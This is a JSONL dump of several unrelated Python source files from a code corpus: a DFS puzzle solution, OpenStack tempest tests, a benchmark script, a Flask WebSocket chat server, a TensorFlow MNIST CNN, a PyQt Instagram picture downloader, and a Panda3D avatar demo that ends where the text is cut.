+{"seq_id":"23039649","text":"import sys\nsys.stdin = open('input.txt', 'r')\n\ndef dfs(i, temp, a, b, c, d):\n if not a and not b and not c and not d:\n global maxval, minval\n if minval == None:\n minval = maxval = temp\n if temp < minval:\n minval = temp\n elif temp > maxval:\n maxval = temp\n return\n if a: dfs(i+1, temp+nums[i+1], a-1, b, c, d)\n if b: dfs(i+1, temp-nums[i+1], a, b-1, c, d)\n if c: dfs(i+1, temp*nums[i+1], a, b, c-1, d)\n if d: dfs(i+1, int(temp/nums[i+1]), a, b, c, d-1)\n\nfor tc in range(1, int(input())+1):\n N = int(input())\n a, b, c, d = map(int, input().split())\n nums = list(map(int, input().split()))\n minval = maxval = None\n dfs(0, nums[0], a, b, c, d)\n print('#{} {}'.format(tc, maxval-minval))\n\n\n# def operation(n, op, m):\n# if op == 0:\n# return n+m\n# elif op == 1:\n# return n-m\n# elif op == 2:\n# return n*m\n# else:\n# return n//m\n#\n# def dfs(i, temp, a):\n# if i == N-1:\n# global maxval, minval\n# if temp < minval:\n# minval = temp\n# elif temp > maxval:\n# maxval = temp\n# return\n# for k in range(N-1):\n# if not visit[k]:\n# visit[k] = True\n# b = a + [q[k]]\n# if b not in memo[i]:\n# memo[i].append(b)\n# dfs(i+1, operation(temp, q[k], nums[i+1]), b)\n# visit[k] = False\n#\n# for tc in range(1, int(input())+1):\n# N = int(input())\n# op = list(map(int, input().split()))\n# nums = list(map(int, input().split()))\n# visit = [False]*(N-1)\n# memo = [[] for _ in range(N-1)]\n# temp = nums[0]\n# q = []\n# n = 0\n# for i in range(4):\n# for j in range(op[i]):\n# q.append(i)\n# n += 1\n# temp = operation(temp, i, nums[n])\n# minval = maxval = 0\n# dfs(0, nums[0], [])\n# print('#{} {}'.format(tc, maxval-minval))","sub_path":"swea/SAMSUNG/4008.py","file_name":"4008.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"137131399","text":"\n\nfrom daisy_tempest import base\n\n\nclass DaisyComponentTest(base.BaseDaisyTest):\n\n @classmethod\n def resource_setup(cls):\n super(DaisyComponentTest, cls).resource_setup()\n cls.host_meta = {'name': 'test_add_host',\n 'description': 'test_tempest'}\n cls.host_meta_interfaces = \\\n {'type': 'ether',\n 'name': 'eth1',\n 'mac': 'fe80::f816:3eff',\n 'ip': '10.43.177.121',\n 'netmask': '255.255.254.0',\n 'is_deployment': 'True',\n 'assigned_networks': ['MANAGEMENT', 'DEPLOYMENT'],\n 'slaves': 'eth1'}\n\n cls.cluster_meta = \\\n {'description': 'desc',\n 'logic_networks':\n [{'name': 'external1',\n 'physnet_name': 'PRIVATE',\n 'segmentation_id': 200,\n 'segmentation_type': 'vlan',\n 'shared': True,\n 'subnets': [{'cidr': '192.168.1.0/24',\n 'dns_nameservers': ['8.8.4.4',\n '8.8.8.8'],\n 'floating_ranges': [['192.168.1.2',\n '192.168.1.200']],\n 'gateway': '192.168.1.1',\n 'name': 'subnet2'},\n {'cidr': '172.16.1.0/24',\n 'dns_nameservers': ['8.8.4.4',\n '8.8.8.8'],\n 'floating_ranges': [['172.16.1.130',\n '172.16.1.150'],\n ['172.16.1.151',\n '172.16.1.254']],\n 'gateway': '172.16.1.1',\n 'name': 'subnet10'}],\n 'type': 'external'},\n {'name': 'external2',\n 'physnet_name': 'PUBLIC',\n 'segmentation_id': 1023,\n 'segmentation_type': 'vxlan',\n 'shared': True,\n 'subnets': [{'cidr': '192.168.2.0/24',\n 'dns_nameservers': ['8.8.4.4',\n '8.8.8.8'],\n 'floating_ranges': [['192.168.2.130',\n '192.168.2.254']],\n 'gateway': '192.168.2.1',\n 'name': 'subnet123'}],\n 'type': 'external'},\n {'name': 'internal1',\n 'physnet_name': 'PRIVATE',\n 'segmentation_id': '777',\n 'segmentation_type': 'vlan',\n 'shared': False,\n 'subnets': [{'cidr': '192.168.31.0/24',\n 'dns_nameservers': ['8.8.4.4',\n '8.8.8.8'],\n 'floating_ranges': [['192.168.31.130',\n '192.168.31.254']],\n 'gateway': '192.168.31.1',\n 'name': 'subnet3'},\n {'cidr': '192.168.4.0/24',\n 'dns_nameservers': ['8.8.4.4',\n '8.8.8.8'],\n 'floating_ranges': [['192.168.4.130',\n '192.168.4.254']],\n 'gateway': '192.168.4.1',\n 'name': 'subnet4'}],\n 'type': 'internal'}],\n 'name': 'test',\n 'networking_parameters': {'base_mac': 'fa:16:3e:00:00:00',\n 'gre_id_range': [2, 2000],\n 'net_l23_provider': 'ovs',\n 'public_vip': '172.16.0.3',\n 'segmentation_type': 'vlan,vxlan',\n 'vlan_range': [2, 4094],\n 'vni_range': [1000, 1030]},\n 'networks': [],\n 'nodes': [],\n 'routers': [{'description': 'router1',\n 'external_logic_network': 'external1',\n 'name': 'router1',\n 'subnets': ['subnet4', 'subnet3']},\n {'description': 'router2',\n 'external_logic_network': 'external2',\n 'name': 'router2',\n 'subnets': ['subnet2', 'subnet10']}]}\n cls.component_meta = {'name': 'test_component',\n 'description': 'test'}\n\n def test_list_component(self):\n component_meta = {}\n component_flag = True\n list_component = self.list_component(**component_meta)\n query_component_list = [component_info for component_info\n in list_component]\n component_list = [\"camellia\", \"ha\", \"loadbalance\", \"amqp\", \"database\",\n \"keystone\", \"ironic\", \"neutron\",\n \"horizon\", \"ceilometer\", \"glance\", \"heat\", \"nova\",\n \"cinder\"]\n for query_component in query_component_list:\n if query_component.name not in component_list:\n component_flag = False\n self.assertTrue(component_flag, \"test_list_component error\")\n\n def test_add_component(self):\n component = self.add_component(**self.component_meta)\n self.assertEqual(\"test_component\",\n component.name,\n \"test_add_component failed\")\n self.delete_component(component.id)\n\n def test_component_delete(self):\n component = self.add_component(**self.component_meta)\n self.delete_component(component.id)\n component_flag = True\n component_meta = {}\n list_component = self.list_component(**component_meta)\n query_component_list = [component_info for component_info\n in list_component]\n for query_component in query_component_list:\n if component.name == query_component.name:\n component_flag = False\n self.assertTrue(component_flag, \"test_list_component error\")\n\n def test_get_component_detail(self):\n add_component_info = self.add_component(**self.component_meta)\n get_component = self.get_component(add_component_info.id)\n self.assertEqual('test_component', get_component.name)\n self.delete_component(get_component.id)\n\n def test_update_component(self):\n add_component_info = self.add_component(**self.component_meta)\n update_component_meta = {'name': 'test_update_component',\n 'description': 'test_tempest'}\n update_component_info = self.update_component(add_component_info.id,\n **update_component_meta)\n self.assertEqual(\"test_update_component\",\n update_component_info.name,\n \"test_update_component_with_cluster failed\")\n self.delete_component(add_component_info.id)\n","sub_path":"test/tempest/daisy_tempest/v1/test_component.py","file_name":"test_component.py","file_ext":"py","file_size_in_byte":7253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"11913820","text":"#!/usr/bin/python\n\nimport nji\nimport os\nimport time\nimport threading\n\nprint(\"Benchmarking installed njic\")\n\nclass Benchmark(threading.Thread):\n def __init__(self, javap):\n threading.Thread.__init__(self)\n self.javap = javap\n def run(self):\n nji.parse(open(path), None, self.javap)\n\nthread_count = 8\ncount = 100\n#path = os.path.join(os.getcwd(), 'thread.nji')\npath = os.path.join('/home/brock/code/libnji/test', 'thread.nji')\nthreads = []\nprint(\"Benchmarking default nji.parse shelling out to javap {} times\".format(count))\nstart = time.perf_counter()\ni = 0\nwhile i < count:\n threads = []\n for j in range(thread_count):\n thread = Benchmark(False)\n thread.start()\n threads.append(thread)\n\n for t in threads:\n t.join()\n i += thread_count\n print(\"{} threads done\".format(i))\n\nend = time.perf_counter()\nprint(\"Default nji.parse took {} seconds\".format(end-start))\n\nprint(\"Benchmarking nji.parse using pyjavap {} times\".format(count))\nstart = time.perf_counter()\ni = 0\nwhile i < count:\n threads = []\n for j in range(thread_count):\n thread = Benchmark(False)\n thread.start()\n threads.append(thread)\n\n for t in threads:\n t.join()\n i += thread_count\n print(\"{} threads done\".format(i))\nend = time.perf_counter()\nprint(\"nji.parse with pyjavap took {} seconds\".format(end-start))\n","sub_path":"tools/njic/src/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"139629151","text":"\"\"\"\nChat Server\n===========\n\nThis simple application uses WebSockets to run a primitive chat server.\n\"\"\"\n\nimport ast\nimport os\nimport time\nfrom flask import Flask, render_template\nfrom flask_sockets import Sockets\n\napp = Flask(__name__)\napp.debug = 'DEBUG' in os.environ\nsockets = Sockets(app)\n\n\nclass ChatBackend(object):\n\n def __init__(self):\n \"\"\"Maintain list of subscriptions (client, list of channels pair).\"\"\"\n self.subscriptions = list()\n\n def publish(self, message):\n \"\"\"Send message to client if client is subsribed.\"\"\"\n for subscription in self.subscriptions:\n for subscribed_channel in subscription['channels']:\n channel = ast.literal_eval(message)['handle']\n if subscribed_channel == channel:\n try:\n subscription['client'].send(message)\n except Exception:\n self.subscriptions.remove(subscription)\n\n def subscribe(self, client, channels):\n \"\"\"Add a subscription (client, list of channels pair).\"\"\"\n subscription = {'client': client, 'channels': channels}\n self.subscriptions.append(subscription)\n\nchats = ChatBackend()\n\n\n@app.route('/')\ndef hello():\n return render_template('index.html')\n\n\n@sockets.route('/submit')\ndef inbox(ws):\n \"\"\"Receives incoming chat messages and publishes them.\"\"\"\n while ws.socket is not None:\n # Sleep to prevent *contstant* context-switches.\n time.sleep(0.1)\n message = ws.receive()\n\n if message:\n chats.publish(message)\n\n\n@sockets.route('/receive')\ndef outbox(ws):\n \"\"\"Sends outgoing chat messages, via `ChatBackend`.\"\"\"\n chats.subscribe(ws, ['channel1', 'channel2'])\n\n while ws.socket is not None:\n # Context switch while `ChatBackend` is running in the background.\n time.sleep()\n","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"153437309","text":"import numpy as np\nimport tensorflow as tf\nimport os\nfrom datetime import datetime\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport matplotlib.pyplot as plt\nimport shutil\n\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\nlearning_rate = 1e-3\ninput_nodes = 784\noutput_nodes = 10\nepochs = 30\nbatch_size = 100\n\nX = tf.placeholder(tf.float32, [None, input_nodes])\nT = tf.placeholder(tf.float32, [None, output_nodes])\n\nA1 = X_img = tf.reshape(X, [-1, 28, 28, 1])\n\nW2 = tf.Variable(tf.random.normal([3,3,1,32], stddev=0.01))\nb2 = tf.Variable(tf.random.normal([32]))\n\nC2 = tf.nn.conv2d(A1, W2, strides=[1,1,1,1], padding='SAME')\nZ2 = tf.nn.relu(C2 + b2)\nA2 = P2 = tf.nn.max_pool(Z2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\nA2_img = tf.reshape(A2, [-1, 14, 14, 32])\n\nW3 = tf.Variable(tf.random.normal([3,3,32,32], stddev=0.01))\nb3 = tf.Variable(tf.random.normal([32]))\n\nC3 = tf.nn.conv2d(A2_img, W3, strides=[1,1,1,1], padding=\"SAME\")\nZ3 = tf.nn.relu(C3+b3)\nA3 = P3 = tf.nn.max_pool(Z3, ksize=[1,2,2,1], strides=[1,2,2,1], padding=\"SAME\")\nA3_flat = P3_flat = tf.reshape(A3, [-1, 7,7,32])\n\nW4 = tf.Variable(tf.random_normal([3,3,32,32], stddev=0.01))\nb4 = tf.Variable(tf.random.normal([32]))\n\nC4 = tf.nn.conv2d(A3_flat, W4, strides=[1,1,1,1], padding=\"SAME\")\nZ4 = tf.nn.relu(C4+b4)\nA4 = tf.nn.max_pool(Z4, ksize=[1,2,2,1], strides=[1,2,2,1], padding=\"SAME\")\nA4_flat = tf.reshape(A4, [-1,4*4*32])\n\nW5 = tf.Variable(tf.random_normal([4*4*32, 10]))\nb5 = tf.Variable(tf.random_normal([10]))\n\nZ5 = logits = tf.matmul(A4_flat, W5) + b5\ny = A5 = tf.nn.softmax(Z5)\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=Z5, labels=T))\n\noptimizer = tf.train.AdamOptimizer(learning_rate)\ntrain = optimizer.minimize(loss)\n\npredicted = tf.equal(tf.argmax(A5, 1), tf.argmax(T,1))\naccuracy = tf.reduce_mean(tf.cast(predicted, dtype=tf.float32))\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n start_time = datetime.now()\n\n for i in range(epochs):\n total_batch = int(mnist.train.num_examples / batch_size)\n for step in range(total_batch):\n batch_x_data, batch_t_data = mnist.train.next_batch(batch_size)\n loss_val, train_val = sess.run([loss, train], feed_dict={X: batch_x_data, T:batch_t_data})\n\n if step % 10 == 0:\n print(\"epochs =\", i, \", step =\", step, \", loss_val =\", loss_val)\n end_time = datetime.now()\n print(\"\\nelapsed time =\", end_time - start_time)\n\n test_x_data = mnist.test.images\n test_t_data = mnist.test.labels\n\n A5_val, predicted_val, accuracy_val = sess.run([A5, predicted, accuracy], feed_dict = {X: test_x_data, T: test_t_data})\n print(\"\\nAccuracy_val\", accuracy_val)\n\n end_time = datetime.now()\n print(\"Time spen\", end_time - start_time)\n\n temp_list = []\n index_label_false_list = []\n np_false_number = np.zeros([10])\n\n for index in range(len(predicted_val)):\n if predicted_val[index] == False:\n temp_list.append(index)\n temp_list.append(np.argmax(test_t_data[index]))\n temp_list.append(np.argmax(A5_val[index]))\n index_label_false_list.append(temp_list)\n temp_list = []\n np_false_number[np.argmax(test_t_data[index])] += 1\n else:\n pass\n print(index_label_false_list)\n print(np_false_number)\n #for index in range(len(index_label_false_list)):\n curr_dir = os.getcwd()\n print(os.getcwd())\n deeplearning_path = 'C:\\\\Users\\\\user\\\\PycharmProjects\\\\DeepLearning'\n\n first_file_name = 'mnist_false_figure'\n now = datetime.now()\n file_name = first_file_name + str(now.year)+'_' + str(now.month)+'_' + str(now.day)+'_' + str(now.hour)+'_' + str(now.minute)\n direct = deeplearning_path+'\\\\'+file_name\n if os.path.exists(direct):\n shutil.rmtree(direct)\n os.mkdir(direct)\n os.chdir(direct)\n\n for index in range(len(index_label_false_list)):\n plt.title(\"label = \"+str(index_label_false_list[index][1])+\" prediction = \"+str(index_label_false_list[index][2]))\n img = test_x_data[index_label_false_list[index][0], :].reshape(28, 28)\n plt.imshow(img, cmap='gray')\n fig = plt.gcf()\n fig.savefig(str(index_label_false_list[index][0])+'.png')\n if index % 10 == 0:\n print(\"index =\", index, \"images are saved!\")\n os.chdir(curr_dir)","sub_path":"DeepLearning/tensorflow/tensorflow_covolution_mnist_c3.py","file_name":"tensorflow_covolution_mnist_c3.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"484797622","text":"#!/usr/bin/env python\n\n\"\"\"\n Instagram Downloader\n --------------------\n Version: 1.0\n Author: Arian Giles García\n Date: 27/09/2015\n\"\"\"\n\nimport os\nimport sys\nimport shutil\nimport urllib.request\n\nfrom bs4 import BeautifulSoup\nfrom PyQt4 import QtCore, QtGui\n\nimport resources\n\nAUX_FILE_PATH = \"../img/aux.jpg\"\n\nclass MainWindow(QtGui.QMainWindow):\n __version = \"v1.0\"\n __initialized = 0\n\n def __init__(self):\n super(MainWindow, self).__init__()\n self.setup_ui()\n\n # Setup Worker\n self.worker = WorkerThread()\n self.connect(self.worker, QtCore.SIGNAL(\"threadDone()\"), self.show_picture)\n self.connect(self.worker, QtCore.SIGNAL(\"threadError()\"), self.show_error)\n\n self.show()\n\n def setup_ui(self):\n # Main Window\n self.screen_size = (QtGui.QApplication.desktop().screen().rect().width(), QtGui.QApplication.desktop().screen().rect().height())\n self.window_size = (550, 700)\n\n self.setGeometry(self.screen_size[0] / 2 - self.window_size[0] / 2,\n self.screen_size[1] / 2 - self.window_size[1] / 2,\n self.window_size[0], self.window_size[1])\n\n self.setMaximumSize(self.window_size[0], self.window_size[1])\n self.setMinimumSize(self.window_size[0], self.window_size[1])\n\n self.setWindowTitle(\"Instagram Downloader\" + \" \" + self.__version)\n self.setWindowIcon(QtGui.QIcon(\":img/icon.png\"))\n\n # Main Window Color\n self.palette = QtGui.QPalette()\n self.color = QtGui.QColor(63, 114, 155)\n self.palette.setColor(QtGui.QPalette.Background, self.color)\n self.setPalette(self.palette)\n\n # Menu Bar\n save_action = QtGui.QAction(\"&Save\", self)\n save_action.setShortcut(\"Ctrl+S\")\n save_action.setStatusTip(\"Save the picture\")\n save_action.triggered.connect(self.save_picture)\n\n exit_action = QtGui.QAction(\"&Exit\", self)\n exit_action.setShortcut(\"Ctrl+Q\")\n exit_action.setStatusTip(\"Leave the app\")\n exit_action.triggered.connect(self.exit_app)\n\n about_action = QtGui.QAction(\"&About\", self)\n about_action.setStatusTip(\"Shows information about the application\")\n about_action.triggered.connect(self.show_about)\n\n # Status Bar\n self.status_bar = QtGui.QStatusBar(self)\n self.color = QtGui.QColor(52, 94, 128)\n self.palette.setColor(QtGui.QPalette.Background, self.color)\n self.palette.setColor(QtGui.QPalette.Foreground, QtCore.Qt.white)\n\n self.status_bar.setPalette(self.palette)\n self.setStatusBar(self.status_bar)\n\n mainMenu = self.menuBar()\n\n fileMenu = mainMenu.addMenu(\"&File\")\n fileMenu.addAction(save_action)\n fileMenu.addSeparator()\n fileMenu.addAction(exit_action)\n\n fileMenu = mainMenu.addMenu(\"&Help\")\n fileMenu.addAction(about_action)\n\n # Label (Title)\n self.label = QtGui.QLabel(self)\n self.label_img = QtGui.QPixmap(\":img/header.png\")\n self.label.setPixmap(self.label_img)\n self.label.move(0, 30)\n self.label.setAlignment(QtCore.Qt.AlignCenter)\n\n # Label Font\n font = QtGui.QFont()\n font.setFamily(\"Sans Serif\")\n font.setPointSize(30)\n self.label.setFont(font)\n\n self.label.resize(self.label.minimumSizeHint())\n self.label.setFixedWidth(550)\n\n # Line Edit\n self.url_text = QtGui.QLineEdit(self)\n self.url_text.setFixedWidth(400)\n self.url_text.move(10, 110)\n\n # Button\n self.download_button = QtGui.QPushButton(self)\n self.download_button.setText(\"Download\")\n self.download_button.setFixedWidth(120)\n self.download_button.move(420, 110)\n self.download_button.pressed.connect(self.button_pushed)\n\n # Picture Label\n self.picture_label = QtGui.QLabel(self)\n self.picture = QtGui.QPixmap(\":img/placeholder.png\")\n self.picture_label.setPixmap(self.picture)\n self.picture_label.resize(self.picture_label.minimumSizeHint())\n self.picture_label.move(25, 155)\n self.picture_label.setAlignment(QtCore.Qt.AlignCenter)\n\n def show_about(self):\n self.about = WindowAbout(self)\n self.about.exec_()\n\n def show_error(self):\n QtGui.QMessageBox.information(self,\n \"Error\",\n \"There was an error.\\n Please make sure you've entered a valid instagram URL\",\n QtGui.QMessageBox.Ok)\n\n def save_picture(self):\n if self.__initialized:\n picture_file_name = \"Picture.jpg\"\n file_name = QtGui.QFileDialog.getSaveFileName(self, 'Save picture', picture_file_name, filter='*.jpg')\n\n if file_name.split(\".\")[-1] != \"jpg\":\n file_name += \".jpg\"\n\n shutil.copyfile(AUX_FILE_PATH, file_name)\n else:\n QtGui.QMessageBox.information(self,\n \"Instagram Downloader\",\n \"There is no picture to save\",\n QtGui.QMessageBox.Ok)\n\n def button_pushed(self):\n self.worker.set_url(self.url_text.text())\n self.worker.start()\n\n def show_picture(self):\n self.picture = QtGui.QPixmap(AUX_FILE_PATH)\n self.picture = self.picture.scaled(500, 500, QtCore.Qt.KeepAspectRatio)\n self.picture_label.setPixmap(self.picture)\n\n self.url_text.setText(\"\")\n\n self.__initialized = 1\n\n def exit_app(self):\n if self.__initialized:\n choice = QtGui.QMessageBox.question(self,\n \"Exit\",\n \"Sure you wanna quit?\",\n QtGui.QMessageBox.Yes | QtGui.QMessageBox.No,\n QtGui.QMessageBox.No) # No selected by default\n\n if choice == QtGui.QMessageBox.Yes:\n try:\n os.remove(AUX_FILE_PATH)\n self.about.close()\n except:\n pass\n else:\n return\n\n sys.exit()\n\n def closeEvent(self, event):\n if self.__initialized:\n choice = QtGui.QMessageBox.question(self,\n \"Exit\",\n \"Sure you wanna quit?\",\n QtGui.QMessageBox.Yes | QtGui.QMessageBox.No,\n QtGui.QMessageBox.No) # No selected by default\n\n if choice == QtGui.QMessageBox.Yes:\n event.accept()\n try:\n os.remove(AUX_FILE_PATH)\n self.about.close()\n except:\n pass\n else:\n event.ignore()\n else:\n try:\n os.remove(AUX_FILE_PATH)\n except:\n pass\n\n try:\n self.about.close()\n except:\n pass\n\n event.accept()\n\n\nclass InstaDownParser:\n def get_picture_link(self, url):\n try:\n response = urllib.request.urlopen(url).read()\n soup = BeautifulSoup(response)\n\n for item in soup.find_all(\"meta\", {\"property\": \"og:image\"}):\n picture_link = item.get(\"content\")\n return picture_link\n\n except:\n return None\n\n def save_picture(self, picture_link, file_name):\n if picture_link is None:\n pass\n else:\n urllib.request.urlretrieve(picture_link, file_name)\n\n\nclass WorkerThread(QtCore.QThread):\n def __init__(self):\n super(WorkerThread, self).__init__()\n\n def run(self):\n parser = InstaDownParser()\n link = parser.get_picture_link(self.url)\n if link is None:\n self.emit(QtCore.SIGNAL(\"threadError()\"))\n else:\n parser.save_picture(link, AUX_FILE_PATH)\n self.emit(QtCore.SIGNAL(\"threadDone()\"))\n\n def set_url(self, url):\n self.url = url\n\n\nclass WindowAbout(QtGui.QDialog):\n def __init__(self, parent=None):\n super(WindowAbout, self).__init__()\n self.setup_ui()\n self.show()\n\n def setup_ui(self):\n # Main Window\n self.screen_size = (QtGui.QApplication.desktop().screen().rect().width(), QtGui.QApplication.desktop().screen().rect().height())\n self.window_size = (480, 280)\n\n self.setGeometry(self.screen_size[0] / 2 - self.window_size[0] / 2,\n self.screen_size[1] / 2 - self.window_size[1] / 2,\n self.window_size[0], self.window_size[1])\n\n self.setMaximumSize(self.window_size[0], self.window_size[1])\n self.setMinimumSize(self.window_size[0], self.window_size[1])\n\n self.setWindowTitle(\"Instagram Downloader\")\n self.setWindowIcon(QtGui.QIcon(\":img/icon.png\"))\n\n # Main Window Color\n self.palette = QtGui.QPalette()\n self.color = QtGui.QColor(63, 114, 155)\n self.palette.setColor(QtGui.QPalette.Background, self.color)\n self.setPalette(self.palette)\n\n # Title\n self.label = QtGui.QLabel(self)\n self.label_img = QtGui.QPixmap(\":img/header.png\")\n self.label.setPixmap(self.label_img)\n self.label.setMinimumSize(self.label.minimumSizeHint())\n self.label.move(10, 20)\n self.label.setAlignment(QtCore.Qt.AlignCenter)\n\n # Description\n self.description = QtGui.QLabel(self)\n\n # Label Font\n font = QtGui.QFont()\n font.setFamily(\"Sans Serif\")\n font.setPointSize(11)\n self.description.setFont(font)\n\n # Description\n self.description.setText(\"Instagram downloader is a simple application that lets you \\n\"\n \"easily download instagram pictures to your computer.\\n\\n\"\n \"Coded by Arian Giles García.\\n\"\n \"Córdoba, Argentina.\\n\"\n \"2015.\\n\")\n\n self.description.resize(self.description.minimumSizeHint())\n\n move_distance = (self.window_size[0] - self.description.width())/2\n self.description.move(move_distance, 110)\n\n # Label Text Color\n color = QtGui.QColor(200, 200, 255)\n self.description.setStyleSheet(\"QWidget {color: %s}\" % color.name())\n self.description.setAlignment(QtCore.Qt.AlignCenter)\n\n # Close Button\n self.close_button = QtGui.QPushButton(self)\n self.close_button.setText(\"Close\")\n self.close_button.move(195, 240)\n self.close_button.pressed.connect(self.close)\n\n\ndef run():\n app = QtGui.QApplication(sys.argv)\n gui = MainWindow()\n sys.exit(app.exec_())\n\n\nrun()\n","sub_path":"instagram-downloader/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"616083876","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCollisionHandlerFloor - how to steer an avatar on a uneven terrain keeping it grounded.\n\nby fabius astelix @2010-01-25\n\nLevel: INTERMEDIATE\n\nWe'll see how to settle up a scene to have a movable avatar following the Z-height of an uneven the terrain. All of this is drived by the panda3D CollisionHandlerFloor collision handler.\n\nNOTE If you won't find here some line of code explained, probably you missed it in the previous steps - if you don't find there as well though, or still isn't clear for you, browse at http://www.panda3d.org/phpbb2/viewtopic.php?t=7918 and post your issue to the thread.\n\nBast Centipede by Fernando Gurgel @2015\n\n\"\"\"\n\nimport direct.directbase.DirectStart\nimport json\nfrom pandac.PandaModules import *\nfrom direct.directtools.DirectGeometry import LineNodePath\nfrom direct.gui.OnscreenText import OnscreenText\nfrom panda3d.core import ColorAttrib\nfrom panda3d.core import *\nfrom panda3d.ode import *\nfrom direct.task import Task\nimport sys\nimport time\n\nfrom direct.showbase.DirectObject import DirectObject\nfrom pandac.PandaModules import CollisionHandlerFloor, CollisionNode, CollisionTraverser, BitMask32, CollisionRay\n\nfrom pandac.PandaModules import loadPrcFileData\nloadPrcFileData(\"\", \"\"\"sync-video 0\n\"\"\"\n)\nimport direct.directbase.DirectStart\n#** snippet support routines - not concerning the tutorial part\nimport snipstuff\n\ndef drawLines():\n # Draws lines between the smiley and frowney.\n lines.reset()\n lines.drawLines([((art.getX(), art.getY(), art.getZ()),\n\t\t\t\t\t(avatar.getX(), avatar.getY(), avatar.getZ())),\n\t\t\t\t ((avatar.getX(), avatar.getY(), avatar.getZ()),\n\t\t\t\t\t(0, 0, 0))])\n lines.create()\n\n\n\ndef updateTask(task):\n\tupdatePlayer()\n\t#updateCamera()\n\treturn Task.cont\n\n\ndef checkjson():\n\ttime.sleep(0.1)\n\ttry:\n\t\tjson_data = open('cmd.json').read()\n\t\tdata = json.loads(json_data)\n\t\tdirection1 = data[\"direction1\"]\n\t\tdirection2 = data[\"direction2\"]\n\t\tdirection3 = data[\"direction3\"]\n\t\tintensity1 = int(data[\"intensity1\"])\n\t\tintensity2 = int(data[\"intensity2\"])\n\t\tintensity3 = int(data[\"intensity3\"])\n\t\trotz = data[\"rotation\"]\n\t\treturn direction1, direction2, direction3, intensity1 ,intensity2, intensity3, rotz\n\texcept:\n\t\treturn \"down\", \"down\", \"down\", 0, 0, 0, 0\n\n\n\n\ndef updatePlayer():\n\t\n\t(direction1, direction2, direction3, intensity1, intensity2, intensity3, rotz) = checkjson()\n\tif (direction1==\"up\"):\n\t\tart.setZ(avatar.getZ()+abs(intensity1))\n\t\tavatar.setHpr(0,90,rotz)\t\t\n\telif (direction1==\"down\"):\n\t\tart.setZ(avatar.getZ()-abs(intensity1))\n\t\tavatar.setHpr(0,90,rotz)\t\n\tif (direction2==\"up\"):\n\t\tart2.setZ(avatar.getZ()+abs(intensity2))\t\n\t\tart2.setHpr(0,0,intensity2*10)\t\t\n\telif (direction2==\"down\"):\n\t\tart2.setZ(avatar.getZ()-abs(intensity2))\n\t\tart2.setHpr(0,0,intensity2*10)\t\n\tif (direction3==\"up\"):\n\t\tart3.setZ(avatar.getZ()+abs(intensity3))\t\t\n\t\tart3.setHpr(0,0,intensity3*10)\t\n\telif (direction3==\"down\"):\n\t\tart3.setZ(avatar.getZ()-abs(intensity3))\n\t\tart3.setHpr(0,0,intensity3*10)\t\n\t\t\n\t\t\n\t\t\n\t\n\n\n\ndef updateCamera():\n\t# see issue content for how we calculated these:\n\tcamera.setPos(player2, 25.6225, 3.8807, 10.2779)\n\tcamera.setHpr(player2,94.8996,-16.6549,1.55508)\n\n\n#=========================================================================\n# Scenographic stuff\n#=========================================================================\nbase.cam.setPos(40, -70, 35)\n\nsplash=snipstuff.splashCard()\nsnipstuff.info.append(\"Collisions With Floor and Walls in action\")\nsnipstuff.info.append(\"a minimal sample to show how to keep an avatar grounded and blocked by invisible walls\")\nsnipstuff.info.append(\"WASD=move the avatar around\\nSPACE=avatar hiccup\")\nsnipstuff.info_show()\n\n#=========================================================================\n# Main\n\"\"\"\nStarting from step1, we just put an additional collision handler to take care to keep the avatar grounded. This will PUSH the avatar back as soon as hit geometry we settled to be a wall: in blender we modelled polygons to wrap around the little house and all around the terrain area so that this time the avatar, differently from step1, won't pass through the house and won't be able to leave the terrain perimeter anymore. I suggest you to open the blender source to find out what I'm talking about here.\n\"\"\"\n#=========================================================================\n\n#** Collision system ignition\nbase.cTrav=CollisionTraverser()\n# did you saw this stuff in step1?\nfloorHandler = CollisionHandlerFloor()\nfloorHandler.setMaxVelocity(14)\n# here it is the new fella - this will take care to push the avatar off the walls\nwallHandler = CollisionHandlerPusher()\n\n#** As you know this mask is used to mark the geometries for the floor collisions...\nFLOOR_MASK=BitMask32.bit(1)\n#... and this time we need another one to mark the walls as well.\nWALL_MASK=BitMask32.bit(2)\n\n#** This is our steering avatar - this time we use a little different setup, more close to real applications: we wrap either the avatar and its collision ray into another nodepath. This way we add lotta flexibility allowing us to make fancy things like you'll see below, to make the avatar rolling while steering, a thing not possible before and also to get rid of the global floorHandler.setOffset(1.0) shift, to set our avatar precisly placed above the surface.\navatarNP=NodePath('smileyNP')\navatarNP.reparentTo(base.render)\n\navatar = loader.loadModel('cilindroB')\navatar.reparentTo(avatarNP)\n# since our avatar origin is centered in a model sized 2,2,2, we need to shift it 1 unit above the ground and this time we make this happen shifting it off its own root node (avatarNP)\navatar.setPos(0,0,1)\navatar.setHpr(0,90,0)\navatar.setColor(0, 0, 1, 1)\navatar.setCollideMask(BitMask32.allOff())\n\nart = loader.loadModel('cilindroR')\nart.reparentTo(avatar)\n# since our avatar origin is centered in a model sized 2,2,2, we need to shift it 1 unit above the ground and this time we make this happen shifting it off its own root node (avatarNP)\nart.setPos(avatar.getX(),avatar.getY(), avatar.getZ())\nart.setColor(1, 0, 0, 1)\nart.setCollideMask(BitMask32.allOff())\n\navatar2 = loader.loadModel('cilindroB')\navatar2.reparentTo(art)\n# since our avatar origin is centered in a model sized 2,2,2, we need to shift it 1 unit above the ground and this time we make this happen shifting it off its 